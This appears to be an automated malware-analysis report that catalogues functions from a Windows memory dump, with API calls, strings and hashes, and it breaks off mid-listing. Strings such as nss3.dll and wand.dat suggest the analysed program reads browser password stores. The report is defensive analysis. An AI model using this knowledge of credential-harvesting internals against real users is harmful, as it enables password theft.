unknown column "%s" in foreign key definition, xrefs: 004310A5
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430F42
foreign key on %s should reference only one column of table %T, xrefs: 00430F1A

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3510742995-272990098
Opcode ID: a27afdf262ea2b2f13aa3d7c6496d52117a55a242e1c635bc0b46c3f4d569d41
Instruction ID: b4e089481029338f932d4991b26cccaedb5970869045d73953a00dcfe725fe6b
Opcode Fuzzy Hash: a27afdf262ea2b2f13aa3d7c6496d52117a55a242e1c635bc0b46c3f4d569d41
Instruction Fuzzy Hash: 10914B75A00209DFCB24DF59C480A9EBBF1FF48304F15819AE809AB312D739E942CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00406A86, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406AA7
wcslen.MSVCRT ref: 00406AB2
wcslen.MSVCRT ref: 00406AC0
memset.MSVCRT ref: 00406B16

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

nss3.dll, xrefs: 00406AB8, 00406ABD, 00406AD1

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetwcslen$wcscatwcscpy
String ID: nss3.dll
API String ID: 1250441359-2492180550
Opcode ID: 09e33b56ee97e3876529d6a1dbd088a7e67531a27dd58c4da1fdcc6a23c597f8
Instruction ID: 1e34d79d1f5922d0320f8d763ab64a9784b47cc615ba08cf08abcfcfe76fb249
Opcode Fuzzy Hash: 09e33b56ee97e3876529d6a1dbd088a7e67531a27dd58c4da1fdcc6a23c597f8
Instruction Fuzzy Hash: D511ECF290121D96EB10EB60DD49BC673BC9B15314F1004BBE60DF21C1FB79DA548A5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C181, Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166

??3@YAXPAX@Z.MSVCRT ref: 0040C19C
??3@YAXPAX@Z.MSVCRT ref: 0040C1AF
??3@YAXPAX@Z.MSVCRT ref: 0040C1C2
??3@YAXPAX@Z.MSVCRT ref: 0040C1D5
free.MSVCRT(00000000), ref: 0040C20E

Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
Instruction ID: 1b724bf31a54a7cffb96c88967fdb5b0379f9a1dee2f65518d31c165403446cb
Opcode Fuzzy Hash: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
Instruction Fuzzy Hash: 6E01E532905A31D7D6257B7AA68151FB396BEC2710316026FF845BB2C38F3C6C414ADD

Uniqueness

Uniqueness Score: -1.00%

Function 00416DAA, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 00416DB2
WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00416DD2
malloc.MSVCRT ref: 00416DD8
WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00416DF6
free.MSVCRT(?), ref: 00416DFF

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$ApisFilefreemalloc
String ID:
API String ID: 4053608372-0
Opcode ID: 8b75c47431a11f52c87324c6af9dbd18f9e3b72bc027a16140cc791be9c4b708
Instruction ID: 7c4f126962bd8a7e2ff3a65b0fa2dbedc4b8b396d66bab6395f0ad674673df12
Opcode Fuzzy Hash: 8b75c47431a11f52c87324c6af9dbd18f9e3b72bc027a16140cc791be9c4b708
Instruction Fuzzy Hash: B501C8B550411DBF7F115FA5ECC1CFF7AACEA453E8721032AF414E2190D6348E405AB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B60E, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0040B620
GetWindowRect.USER32 ref: 0040B62D
GetClientRect.USER32 ref: 0040B638
MapWindowPoints.USER32 ref: 0040B648
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040B664

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
Instruction ID: 46ce5f71d2b2052eec3e6930e994fa0a792d7dbc784fe0d7727ff2cdb1cfdf95
Opcode Fuzzy Hash: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
Instruction Fuzzy Hash: 9D014836401129BBDB119BA59C49EFFBFBCFF06755F04402AFD01A2181D77895028BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004442F9, Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D

GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
??2@YAPAXI@Z.MSVCRT ref: 00444324
memset.MSVCRT ref: 00444333

Part of subcall function 0040897D: ReadFile.KERNEL32(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994

??3@YAXPAX@Z.MSVCRT ref: 00444356

Part of subcall function 004440EA: memchr.MSVCRT ref: 00444125
Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441C9
Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441DB
Part of subcall function 004440EA: memcpy.MSVCRT ref: 00444203

CloseHandle.KERNEL32(00000000), ref: 0044435D

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
String ID:
API String ID: 1471605966-0
Opcode ID: 49240eb7e72d32db8f10ec2a794cb1604f9c3dfdc848c4e5ddf36aa52843e5e8
Instruction ID: 37ddc15cde46eb5ec9a675e84f83cfdfb4636f792b79cf1c8c19bfac071e4967
Opcode Fuzzy Hash: 49240eb7e72d32db8f10ec2a794cb1604f9c3dfdc848c4e5ddf36aa52843e5e8
Instruction Fuzzy Hash: 64F0C8765006106AE2203732AC89F6B2B5C9FD6761F14043FF916911D2EE2C98148179

Uniqueness

Uniqueness Score: -1.00%

Function 0040C11B, Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040C127
??3@YAXPAX@Z.MSVCRT ref: 0040C135
??3@YAXPAX@Z.MSVCRT ref: 0040C146
??3@YAXPAX@Z.MSVCRT ref: 0040C15D
??3@YAXPAX@Z.MSVCRT ref: 0040C166

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
Instruction ID: ce0d416df33b84177c5a77da38496f7ed087613ba8a01eb08bd82b7dd0746caf
Opcode Fuzzy Hash: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
Instruction Fuzzy Hash: D0F049B25047018FE720AFA9E9C091BF3E9AB49714761093FF049D7682DB7CAC808A0C

Uniqueness

Uniqueness Score: -1.00%

Function 0040D913, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D937
memset.MSVCRT ref: 0040D94E

Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A

_snwprintf.MSVCRT ref: 0040D97D

Strings

</%s>, xrefs: 0040D96C

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
Instruction ID: 1f907657c5db402736beb96cf917ebbb27e5637f268f278bd00e4de1d3b551c4
Opcode Fuzzy Hash: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
Instruction Fuzzy Hash: A701D6B2D4022967E720A755CC45FEA776CEF45308F0400B6BB08B3181DB78DA458AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B720, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B75A
SetWindowTextW.USER32(?,?), ref: 0040B78A
EnumChildWindows.USER32 ref: 0040B79A

Strings

caption, xrefs: 0040B76F

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
Instruction ID: 685c7242f617fb3ba1e31657fb4388fb0a14aaa92a56732ea005dddfaa5a5635
Opcode Fuzzy Hash: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
Instruction Fuzzy Hash: B1F0AF369007186AFB20AB54DC4AB9A326CEB41705F4000B6FA04B71D2DBB8ED80CADC

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004088E9
wcscpy.MSVCRT ref: 004088F7

Strings

X, xrefs: 004088CA
xK@, xrefs: 004088C0

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileNameOpenwcscpy
String ID: X$xK@
API String ID: 3246554996-3735201224
Opcode ID: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
Instruction ID: b0b1e818a48a7f3500c0daa10f1625907e8ff6cd2dadba3970951ebcab59a6c3
Opcode Fuzzy Hash: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
Instruction Fuzzy Hash: 28015FB1D0064C9FDB41DFE9D8856CEBBF4AB09314F10802AE869F6240EB7495458F55

Uniqueness

Uniqueness Score: -1.00%

Function 0040103E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004082B5: memset.MSVCRT ref: 004082BF
Part of subcall function 004082B5: wcscpy.MSVCRT ref: 004082FF

CreateFontIndirectW.GDI32(?), ref: 0040105D
SendDlgItemMessageW.USER32 ref: 0040107C
SendDlgItemMessageW.USER32 ref: 0040109A

Strings

MS Sans Serif, xrefs: 00401049

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
String ID: MS Sans Serif
API String ID: 210187428-168460110
Opcode ID: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
Instruction ID: 6a7807da2d6c22504d803769321e4de0e3b0b92c14fc4c1b5eee7474059f757a
Opcode Fuzzy Hash: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
Instruction Fuzzy Hash: 9EF08275A40B0877EA31ABA0DC06F9A77B9B740B41F000939F751B91D1D7F5A185CA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040840D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040842C
GetClassNameW.USER32 ref: 00408443
_wcsicmp.MSVCRT ref: 00408455

Strings

edit, xrefs: 0040844F

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ClassName_wcsicmpmemset
String ID: edit
API String ID: 2747424523-2167791130
Opcode ID: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
Instruction ID: 157984a491cfffbc22861ef67f020c4accef2e0f69a1167183a5ff10ddf0174f
Opcode Fuzzy Hash: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
Instruction Fuzzy Hash: A2E04872D9031D6AFB10ABA0DC4EFAD77ACAB01748F1001B5B915E10D3EBB896454B45

Uniqueness

Uniqueness Score: -1.00%

Function 004144AB, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE

Strings

shell32.dll, xrefs: 004144B4
SHGetSpecialFolderPathW, xrefs: 004144C8

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 2574300362-880857682
Opcode ID: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
Instruction ID: 5adcb90289d93a3714d1f61360fd38a26edcd17bcdb04c713309b7dc063e595c
Opcode Fuzzy Hash: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
Instruction Fuzzy Hash: 89D0C9BCD00304BFEB014F30AC8A70636A8B760BD7F10503AE001D1662EB78C1908B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1AF, Relevance: 6.3, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041D1C2
memcpy.MSVCRT ref: 0041D1D8
memcmp.MSVCRT ref: 0041D1E7
memcmp.MSVCRT ref: 0041D22F
memcpy.MSVCRT ref: 0041D24A

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memcmp
String ID:
API String ID: 3384217055-0
Opcode ID: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
Instruction ID: 09945ccab50a33f31b382fa22860e11bd1319c866f4a66b9fbc9fb0ddb64ce7b
Opcode Fuzzy Hash: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
Instruction Fuzzy Hash: 2C21A4B2E14248ABDB18DBA5DC45FDF73FCAB85704F10442AF511D7181EA38E644C724

Uniqueness

Uniqueness Score: -1.00%

Function 00410212, Relevance: 6.3, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410231
memset.MSVCRT ref: 00410247
memset.MSVCRT ref: 00410259
memcpy.MSVCRT ref: 0041027E
memset.MSVCRT ref: 00410288

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
Instruction ID: ff146c4b72cd3461ea0581b3b06c61829aab73f766a4367807c7cf9141d7c205
Opcode Fuzzy Hash: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
Instruction Fuzzy Hash: 8C0128B1640B0066E2316B25CC07F5A73A4AFD2714F50061EF142666C2DFECE544815C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5D7, Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004019F1: GetMenu.USER32(?), ref: 00401A0F
Part of subcall function 004019F1: GetSubMenu.USER32 ref: 00401A16
Part of subcall function 004019F1: EnableMenuItem.USER32 ref: 00401A2E

Part of subcall function 00401A38: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A4F
Part of subcall function 00401A38: SendMessageW.USER32(?,00000411,?,?), ref: 00401A73

GetMenu.USER32(?), ref: 0040E7C9
GetSubMenu.USER32 ref: 0040E7D6
GetSubMenu.USER32 ref: 0040E7D9
CheckMenuRadioItem.USER32 ref: 0040E7E5

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Menu$ItemMessageSend$CheckEnableRadio
String ID:
API String ID: 1889144086-0
Opcode ID: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
Instruction ID: 25cc4134299d990fe6d22a23efa4e99655f13f9d527333d0ba489a0a70db3f06
Opcode Fuzzy Hash: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
Instruction Fuzzy Hash: EF519071B40604BBEB20ABA6CD4AF8FBAB9EB44704F00056DB248B72E2C6756D50DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004178F0, Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004179D3
MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004179FE
GetLastError.KERNEL32 ref: 00417A25
CloseHandle.KERNEL32(00000000), ref: 00417A3B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastMappingView
String ID:
API String ID: 1661045500-0
Opcode ID: 1d89631bf252ae2f2c4c8445ece2b1e7c45986c35925c9de674870ee8545aac5
Instruction ID: 2596ed0fad154ed29ebf4184e1ce6d35beb67abfb73833eacff1bbd48ddff306
Opcode Fuzzy Hash: 1d89631bf252ae2f2c4c8445ece2b1e7c45986c35925c9de674870ee8545aac5
Instruction Fuzzy Hash: 0A516EB02087019FEB14CF25C981AABB7F5FF84344F10592EE88287A51E734F994CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042E431, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 004153D6: memset.MSVCRT ref: 004153F0

memcpy.MSVCRT ref: 0042E519

Strings

sqlite_altertab_%s, xrefs: 0042E4EA
Cannot add a column to a view, xrefs: 0042E486
virtual tables may not be altered, xrefs: 0042E470

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpymemset
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 1297977491-2063813899
Opcode ID: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
Instruction ID: bc03cdfccc2981246e0f5b9510b3d89990825f97592217a3aee3a84e95ce5e7f
Opcode Fuzzy Hash: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
Instruction Fuzzy Hash: E741B071A10215EFDB00DFA9D881A99B7F0FF48318F54815BE858DB352E778E990CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00430484, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004305C4

Strings

CREATE TABLE , xrefs: 00430539
, , xrefs: 00430501
, xrefs: 004304FA

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: $, $CREATE TABLE
API String ID: 3510742995-3459038510
Opcode ID: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
Instruction ID: 9113deda8d77e919ddbf50a6a1bf1eccfd02e82bbda2be63f83ad5433933bd3d
Opcode Fuzzy Hash: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
Instruction Fuzzy Hash: 1C518E71D00119EFDB10DF98C491AAFB7B5EF48318F20819BD945AB205E738AA45CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404AC0, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00404B07

Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419

Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE

Part of subcall function 00408AE8: memset.MSVCRT ref: 00408B09
Part of subcall function 00408AE8: _snwprintf.MSVCRT ref: 00408B3C
Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B48
Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B60
Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B6E
Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B81

Part of subcall function 004088A0: GetOpenFileNameW.COMDLG32(?), ref: 004088E9
Part of subcall function 004088A0: wcscpy.MSVCRT ref: 004088F7

Strings

*.*, xrefs: 00404B48
dat, xrefs: 00404B0C
wand.dat, xrefs: 00404B2D

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
String ID: *.*$dat$wand.dat
API String ID: 3589925243-1828844352
Opcode ID: dba498f9c2a615ee4bb20f4d87602121c5d51198321a5fa312053a7b5bc0946c
Instruction ID: 189ab15ad594b46ceda1379ae2a6b1c5413d0dce04db73f13dfcb8633a17526e
Opcode Fuzzy Hash: dba498f9c2a615ee4bb20f4d87602121c5d51198321a5fa312053a7b5bc0946c
Instruction Fuzzy Hash: 0841B771600205AFEF10EF61DD86ADE77B5FF40314F10802BFA05A71D2EB79A9958B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E482, Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB

wcslen.MSVCRT ref: 0040E4B0
_wtoi.MSVCRT ref: 0040E4BC
_wcsicmp.MSVCRT ref: 0040E50A
_wcsicmp.MSVCRT ref: 0040E51B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp$??2@??3@_wtoiwcslen
String ID:
API String ID: 1549203181-0
Opcode ID: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
Instruction ID: a8ded69f91e0d7bf63f89fae3ec1b4bc8203dfd4cc2a8694f23455ab63246b5f
Opcode Fuzzy Hash: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
Instruction Fuzzy Hash: 06417131900204EFCF21DF9AC980A99B7B5EF48358F1548BAEC05EB396E738DA509B55

Uniqueness

Uniqueness Score: -1.00%

Function 00406EB9, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406F06
memcpy.MSVCRT ref: 00406FAD

Part of subcall function 0040134B: strlen.MSVCRT ref: 00401358

Strings

Ap@, xrefs: 00406EC5, 00406FA6, 00406FAC
Ap@, xrefs: 00406F84, 00406F87

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpymemsetstrlen
String ID: Ap@$Ap@
API String ID: 160209724-724177859
Opcode ID: a22eb759962dce0ece25da61dae4aaf75057113ae2506cb2c4c354c91a5046fa
Instruction ID: e2bdeeadc1d90758f2de231e66b6cadccfeb655152d102dc9dd3295dcddd65f9
Opcode Fuzzy Hash: a22eb759962dce0ece25da61dae4aaf75057113ae2506cb2c4c354c91a5046fa
Instruction Fuzzy Hash: 10313371A042069BDB14DFA8AC80BAFB7B89F04310F1100BEE916F72C1DB78DA518769

Uniqueness

Uniqueness Score: -1.00%

Function 0040F843, Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F882

Part of subcall function 004087A4: ShellExecuteW.SHELL32(?,open,?,Function_0004552C,Function_0004552C,00000005), ref: 004087BA

SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040F8F2
GetMenuStringW.USER32 ref: 0040F90C
GetKeyState.USER32(00000010), ref: 0040F938

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExecuteMenuMessageSendShellStateStringmemset
String ID:
API String ID: 3550944819-0
Opcode ID: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
Instruction ID: 0cce36cd3d59050ebbb4ae1468268e07e9567f629d0a6bc52b2b72a07dc00bda
Opcode Fuzzy Hash: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
Instruction Fuzzy Hash: 7041C375500305EBDB30AF15CC88B9673B4EF50325F10857AE9686BAE2C7B8AD89CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD44, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,?,?,?,0040365A), ref: 0040CD9D
memcpy.MSVCRT ref: 0040CDAF
memcpy.MSVCRT ref: 0040CDE2

Strings

Z6@, xrefs: 0040CDBF, 0040CD5C

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$free
String ID: Z6@
API String ID: 2888793982-1638572689
Opcode ID: d95a093917320c7edcb790d909f4cc8d04b331544c50e5d8cbf7f629eee5e05f
Instruction ID: 1cd3d00781b25d2b94616f77ccd2c248328d95a28ed1044bfffefbc926401994
Opcode Fuzzy Hash: d95a093917320c7edcb790d909f4cc8d04b331544c50e5d8cbf7f629eee5e05f
Instruction Fuzzy Hash: EB219034500605EFCB60DF29C98185ABBF6FF84314720467EE852E3790E739EE019B44

Uniqueness

Uniqueness Score: -1.00%

Function 00410174, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004101B7
memcpy.MSVCRT ref: 004101E1
memcpy.MSVCRT ref: 00410205

Strings

@, xrefs: 004101F3

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: @
API String ID: 3510742995-2766056989
Opcode ID: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
Instruction ID: 2b976a00fcfd181f23c33ae21356c60783d23841694cc8dee0d8ac2aa3eeffc6
Opcode Fuzzy Hash: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
Instruction Fuzzy Hash: EA112BB29003057BDB249F15D884DEA77A9EBA0344700062FFD0696251F6BDDED9C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040943C, Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00409471
memset.MSVCRT ref: 00409482
memcpy.MSVCRT ref: 0040948E
??3@YAXPAX@Z.MSVCRT ref: 0040949B

